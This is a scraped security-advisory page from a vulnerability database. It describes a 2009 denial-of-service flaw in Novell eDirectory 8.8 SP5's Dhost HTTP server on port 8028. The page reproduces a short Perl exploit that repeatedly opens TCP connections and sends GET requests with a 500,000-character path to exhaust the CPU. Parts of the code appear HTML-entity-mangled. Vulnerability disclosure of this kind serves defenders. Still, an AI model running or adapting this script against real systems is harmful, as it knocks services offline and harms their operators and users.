Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22434
HistorySep 09, 2009 - 12:00 a.m.

Novell eDirectory 8.8 SP5 Dhost Http Server DoS

2009-09-0900:00:00
vulners.com
4

Affected Software:
Novell eDirectory 8.8 SP5

Vulnerability Description:
Novell eDirectory 8.8 SP5 is vulnerable to a denial of service attack.
If a remote attacker sends Unicode strings with Http Request to "8028 port"
("8028" is the default port of Novell eDirectory Dhost Http Server),
the attacker can cause the system to consume 100% of the CPU resources.

Credits to:
Hellcode Research

Original Advisory:
http://tcc.hellcode.net/advisories/hellcode-adv003.txt

Exploit:

    - snip-

$data = "?" x 500000;

for($i= 0; $i < 1000; $i++)
{
$sock= new IO::Socket::INET( PeerAddr => "localhost",
PeerPort => 8028,

    Proto =&gt; &#39;tcp&#39;,
    Type =&gt; SOCK_STREAM, 

    &#41;;
    
    print $sock &quot;GET /$data HTTP/1.0&#92;r&#92;n&#92;r&#92;n&quot;;
    
    close&#40;$sock&#41;;

}


- snip -